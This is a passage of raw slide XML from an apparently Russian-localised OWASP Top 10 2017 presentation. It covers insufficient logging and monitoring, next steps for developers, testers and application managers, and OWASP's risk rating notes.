                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="ru-RU" sz="90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Ensure high-value transactions have an audit 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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>NIST 800-61 rev 2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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ru-RU" sz="90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ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId13"/>
              </a:rPr>
              <a:t>OWASP AppSensor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, web application firewalls such as </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="900">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:hlinkClick r:id="rId14"/>
              </a:rPr>
              <a:t>ModSecurity with the OWASP ModSecurity Core Rule Set</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU" sz="90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A10</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1400"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="ru-RU" sz="2000"/>
              <a:t>:2017</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Insufficient</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Logging &amp; Monitoring</a:t>
            </a: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Exploitability:</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Prevalence:</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Detectability:</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Technical:</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ru-RU" sz="90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sz="900">
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId15"/>
                        </a:rPr>
                        <a:t>industry survey</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="90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2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>In 2016, identifying a breach took an </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId16"/>
                        </a:rPr>
                        <a:t>average of 191 days</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> – plenty of time for damage to be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a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> &amp; Use Repeatable Security Processes and Standard Security Controls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rPr>
                        <a:t>To help organizations and developers reduce their application security risks in a cost-effective manner, OWASP has produced numerous </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>free and open</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="none" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>resources that 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a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>There are numerous additional OWASP resources available for your use. Please visit the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Projects page</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, which lists all the Flagship, Labs, and Incubator projects in the OWASP project inventory. Most OWASP resources are available on our </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId5"/>
                        </a:rPr>
                        <a:t>wiki</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, and many OWASP documents can be ordered in </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>hardcopy or as eBooks</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" baseline="0">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To produce a </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="900" u="sng" baseline="0">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>secure</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ru-RU" sz="90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T</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="ru-RU" sz="90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ru-RU" sz="900">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> as a </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ru-RU" sz="900">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> a</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ru-RU" sz="90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Standard Security Controls</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or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OWASP AppSec Conference</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+D</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Titel 10"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Developers</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ru-RU" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Establish </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Continuous Application Security Testing</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ru-RU" sz="950" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>continuous</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a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Titel 17"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for Security </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Testers</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Consider using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ru-RU" sz="950">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>and the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ru-RU" sz="950">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>as an input and don’t rely on tool vendors to decide what’s important for your business.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ru-RU" sz="95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ru-RU" sz="950">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>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ru-RU" sz="95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Testing Strategies</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baseline="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ru-RU" sz="1050" b="1">
                  <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t> and Accuracy</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ru-RU" sz="95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in the tools development teams are already using, not PDF files.</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Understand the Threat Model</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SDLC</a:t>
            </a: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Clearly Communicate</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="ru-RU" sz="1050" b="1">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34675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Copyright and License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9653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OWASP (Open Web Application Security Project) — это открытое сообщество, призвающее организации разрабатывать, приобретать и поддерживать безопасные и проверенные приложения и интерфейсы прикладного программирования (API). </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At OWASP, you'll find free and open:</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82550" lvl="0" indent="-8255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rPr>
                        <a:t>Presentations and </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId6"/>
                        </a:rPr>
                        <a:t>videos</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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hlinkClick r:id="rId7"/>
                        </a:rPr>
                        <a:t>Cheat sheets</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="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rPr>
                        <a:t>Standard security controls and libraries.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-8280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hlinkClick r:id="rId8"/>
                        </a:rPr>
                        <a:t>Local chapters worldwide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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rPr>
                        <a:t>Cutting edge research.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr marL="82800" lvl="0" indent="-8280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rPr>
                        <a:t>Extensive </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId9"/>
                        </a:rPr>
                        <a:t>conferences worldwide</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId10"/>
                        </a:rPr>
                        <a:t>Mailing lists</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Learn more at: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId11"/>
                        </a:rPr>
                        <a:t>https://www.owasp.org</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</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All OWASP tools, documents, videos, presentations, and chapters are free and open to anyone interested in improving application security. </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ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="0" i="0" u="none" strike="noStrike" noProof="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>We support innovative security research with grants and infrastructure.</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rPr>
                        <a:t>Come join us!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899922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ПВ</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Примечания к выпуску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безопасности приложений</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b="1">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Т10</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rPr>
                        <a:t>OWASP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Разглашение критичных данных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десериализация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известными</a:t>
                      </a:r>
                      <a:b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уязвимостями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ru-RU" sz="950" baseline="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cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Start</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> Your Application Security Program Now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Applica</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU"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p>
                    <a:p>
                      <a:pPr marL="0" marR="0" lvl="0" indent="0" algn="l" defTabSz="91440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ru-RU" sz="950" baseline="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and the </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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+O</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">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Manage the Full Application Lifecycle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technical counterpart to the application owner. The application manager is in charge of the whole</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" b="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ru-RU" sz="950" b="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p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="ru-RU"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+A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Title 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>What’s Next for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Application </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="ru-RU"/>
            </a:br>
            <a:r>
              <a:rPr lang="ru-RU"/>
              <a:t>Managers</a:t>
            </a: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It’s About the</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1600" b="1" baseline="0">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t> Risks that Weaknesses Represent</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a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>The </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>OWASP Risk Rating Methodology</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> defines numerous factors to help calculate</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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weakness </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prevalence</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, detectability,</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ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:ea typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>) and one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ru-RU" sz="95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ru-RU" sz="950" u="none"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50" u="sng" baseline="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ru-RU" sz="950" u="sng" baseline="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ru-RU" sz="950" u="none"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ru-RU" sz="950" b="1" baseline="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Application</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="10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Exploitability</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>EASY: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ru-RU" sz="1000" b="1" baseline="0">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>WIDESPREAD: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1100" b="1" baseline="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EASY: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Technical</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1000" b="1">
                          <a:solidFill>
                            <a:schemeClr val="bg1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>MODERATE: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Business</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="10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a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU" sz="1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="1800" b="1" baseline="0">
                          <a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>Average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a:solidFill>
                            <a:srgbClr val="00B050"/>
                          </a:solidFill>
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t>= </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="2400" b="1" baseline="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ru-RU" sz="2400" b="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>= 6.0</a:t>
            </a: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+R</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Titel 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="ru-RU">
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              </a:rPr>
              <a:t>Note About Risks</a:t>
            </a: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Top 10 Risk Factor Summary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ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> statistics and the experience of the OWASP Top 10 team</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>. To</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> understand these risks for a particular application or organization, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" u="sng" baseline="0">
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>you must consider your own specific threat agents and business impacts</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="950" baseline="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ru-RU" sz="900" baseline="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950" b="1">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A1:2017-</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                        <a:t/>
                      </a:r>
                      <a:br>
                        <a:rPr lang="ru-RU">
                          <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                        </a:rPr>
                      </a:br>
                      <a:r>
                        <a:rPr lang="ru-RU" sz="900" b="1">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95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900" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>A3:2017-</a:t>
